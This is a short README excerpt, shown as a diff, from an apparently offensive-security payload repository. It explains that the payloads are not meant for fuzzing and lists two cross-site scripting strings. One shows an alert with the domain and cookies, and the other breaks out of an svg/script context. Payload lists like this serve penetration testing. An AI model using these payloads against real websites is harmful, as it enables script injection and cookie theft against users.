RodricBr/OffSec-MISC/README.md

   --- Please do consider that those payloads are used not for fuzzing nor to be added to a wordlist, ---
   --- there are many payloads here that would need additional actions to properly work. ---
   --- But of course, if you do wish to add them to a wordlist, then there's no problem at all! ---
+  --- I also add commentary about every/most of the payloads in the commit history --

   <script>alert(document.domain+"\n\n"+document.cookie);<script>
   </script><svg><script/class=rodric>alert(1)</script>-%26apos;